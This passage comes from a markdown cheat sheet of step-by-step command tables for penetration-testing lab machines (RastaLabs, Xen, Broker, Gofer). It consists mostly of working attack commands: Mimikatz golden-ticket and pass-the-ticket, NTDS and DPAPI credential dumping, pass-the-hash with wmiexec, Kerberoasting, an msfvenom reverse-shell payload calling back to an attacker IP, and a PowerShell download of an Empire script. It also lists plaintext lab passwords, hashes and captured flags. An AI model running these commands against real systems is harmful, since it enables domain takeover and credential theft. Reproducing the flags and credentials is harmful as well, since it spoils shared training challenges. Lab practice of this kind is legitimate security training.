| 4  | Golden Ticket      | Kerberos Golden Ticket Attack | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-... /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
| 5  | Ticket Injection   | Kerberos Ticket Injection     | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket`                                                                                                                |
| 6  | Flag Discovery     | Access Domain Controller      | `pushd \\dc01.rastalabs.local\C$` to access the domain controller and discover the flag `RASTA{r4574l4b5_ch4mp10n}`                                                        |

### Rastalab7

| ID | Stage                | Techniques                      | Command                                                                                                                                                                                                                                                    |
| -- | -------------------- | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Port Forwarding      | Local Port Forwarding           | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445`                                                                                                                                                                                                |
| 2  | Remote Shell Access  | MSF psexec / Impacket psexec    | Use msf or impacket psexec to get shell on ws01                                                                                                                                                                                                            |
| 3  | Routing              | Meterpreter Routing             | Add route in meterpreter, set socks4a proxy in msf                                                                                                                                                                                                         |
| 4  | Hash Dumping         | CrackMapExec with Proxychains   | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa --ntds drsuapi`                                                                                                                   |
| 5  | Credential Access    | Mimikatz Credential Dump        | `dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\849B07832DF408F54711A4BD0EB36FD5 /masterkey:bbfdda29906cd49b7ca3e019a1f2dd79d153611a2c3e932520e41b3d228cec844e2ae46faa2abe236612f52da93b26e85d08c562a7288327d318a65b641f23af` |
| 6  | Clipboard Monitoring | PowerShell Clipboard Monitoring | Use PowerShell to monitor clipboard: `powershell -command "& { iwr http://10.10.14.83/emp.bat -OutFile empire_new.bat}"`                                                                                                                                   |
| 7  | RDP Connection       | Remote Desktop Connection       | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10`                                                                                                                                                                                         |
| 8  | Flag Discovery       | Flag Retrieval                  | Flag found: `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}`                                                                                                                                                                                                          |

### Rastalab8

| ID | Stage           | Techniques            | Command                                                   |
| -- | --------------- | --------------------- | --------------------------------------------------------- |
| 1  | Port Forwarding | Local Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.120.1 -l 445 -p 445` |
| 2  | Remote Shell    | Impacket psexec       | Use impacket psexec to get shell on dc01                  |
| 3  | Log Enumeration | Windows Event Logs    | `Get-EventLog -LogName "Application"`                     |
| 4  | Flag Discovery  | Log Analysis          | Flag found: `RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}`        |

### Rastalab9

| ID | Stage                | Techniques                         | Command                                                                                        |
| -- | -------------------- | ---------------------------------- | ---------------------------------------------------------------------------------------------- |
| 1  | File Access          | Accessing Network Share            | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"`                     |
| 2  | File Conversion      | Convert PPK to OpenSSH             | `puttygen nix01.ppk -O private-openssh -o nix`                                                 |
| 3  | SSH Connection       | Proxychains with SSH               | `proxychains ssh -i nix ahope@10.10.122.20`                                                    |
| 4  | Privilege Escalation | Compile and Transfer Exploit       | `gcc exp1.c -o exploit` and `proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope` |
| 5  | File Transfer        | Secure Copy (SCP) with Proxychains | `proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta`        |
| 6  | Flag Discovery       | Flag Retrieval                     | Flag found: `RASTA{y0ur3_4_b4lh15}`                                                            |

### Xen

| ID | Stage                 | Techniques                         | Commands                                                                                                               |
| -- | --------------------- | ---------------------------------- | ---------------------------------------------------------------------------------------------------------------------- |
| 1  | Initial Recon         | NMAP Scan                          | `nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.12`                                                                    |
| 2  | Web Enumeration       | Directory Enumeration with wfuzz   | `wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ`                                                       |
| 3  | SMTP Enumeration      | smtp-user-enum                     | `smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12`                                      |
| 4  | Phishing              | Crafting Email                     | `telnet 10.13.38.12 25` followed by SMTP commands                                                                      |
| 5  | Access                | Citrix XenAPP                      | Login with captured credentials                                                                                        |
| 6  | Gaining a Shell       | Reverse Shell with msfvenom        | `msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe > x86exploit.exe` |
| 7  | Privilege Escalation  | Local Exploit Suggester            | `use post/multi/recon/local_exploit_suggester` in Metasploit                                                           |
| 8  | Network Scanning      | Internal Network Scan              | Use auxiliary/server/socks4a in Metasploit for proxying                                                                |
| 9  | Kerberoasting         | Harvesting Tickets                 | `Invoke-Kerberoast` in PowerShell                                                                                      |
| 10 | Password Cracking     | hashcat                            | `hashcat -m 13100 ./mturner rockyou.txt --rules`                                                                       |
| 11 | SMB Access            | smbmap and smbclient               | `smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201`                                                      |
| 12 | Putty File Conversion | putty2john                         | `putty2john private.ppk > private.hash`                                                                                |
| 13 | NetScaler Access      | SSH with Private Key               | `ssh -i id_rsa nsroot@172.16.249.202`                                                                                  |
| 14 | Traffic Analysis      | tcpdump                            | `tcpdump -s 0 -A -n -l`                                                                                                |
| 15 | LDAP Passwords        | Capture and Analyze with Wireshark | `tcpdump -w capture.pcap` and analyze with Wireshark                                                                   |
| 16 | Domain Privilege      | WinRM Access                       | `ruby winrm_shell_with_upload.rb`                                                                                      |
| 17 | Shadow Copies         | Diskshadow                         | `diskshadow` commands to create and expose shadow copies                                                               |
| 18 | Domain Admin Access   | Pass the Hash                      | `wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200`    |

### Broker

| ID | Stage             | Techniques                                              | Command                                                                                                           |
| -- | ----------------- | ------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------- |
| 1  | Reconnaissance    | <p>- Nmap scan<br>- Enumerating SMB</p>                 | <p>- <code>nmap -sC -sV -oA nmap/initial 10.10.11.130</code><br>- <code>smbclient -L \\\10.10.11.130\\</code></p> |
| 2  | Gaining Access    | - Exploiting SMB vulnerability                          | - `smbclient \\\\10.10.11.130\\backups`                                                                           |
| 3  | Enumeration       | <p>- Searching for files<br>- Analyzing found files</p> | - `get "Azure Diamond.json"`                                                                                      |
| 4  | Privilege Esc.    | <p>- Using credentials found<br>- Accessing Azure</p>   | - `evil-winrm -i 10.10.11.130 -u 'azureuser' -p 'MyPassword!'`                                                    |
| 5  | Post-Exploitation | <p>- Dumping hashes<br>- Cracking hashes</p>            | <p>- <code>hashdump</code><br>- <code>john hashes --wordlist=/usr/share/wordlists/rockyou.txt</code></p>          |

### Gofer

| ID | Stage           | Techniques                       | Command                                                                         |
| -- | --------------- | -------------------------------- | ------------------------------------------------------------------------------- |
| 1  | Recon           | Scanning with nmap               | `nmap -p- --min-rate 10000 10.10.11.225`                                        |
| 2  | SMB Enumeration | Enumerate shares with netexec    | `netexec smb 10.10.11.225 --shares`                                             |
| 3  | SMB Access      | Access SMB share with smbclient  | `smbclient //10.10.11.225/shares -N`                                            |
| 4  | Email Analysis  | Analyze backup email             | `cat mail` (after retrieving the file)                                          |
| 5  | Subdomain Enum  | Brute force subdomains with ffuf | `ffuf -u http://10.10.11.225 -H "Host: FUZZ.gofer.htb" -w wordlist -mc all -ac` |
| 6  | Proxy Access    | Fuzzing HTTP methods on proxy    | `feroxbuster -u http://proxy.gofer.htb -m GET,POST,PUT,OPTIONS,CONNECT -x php`  |
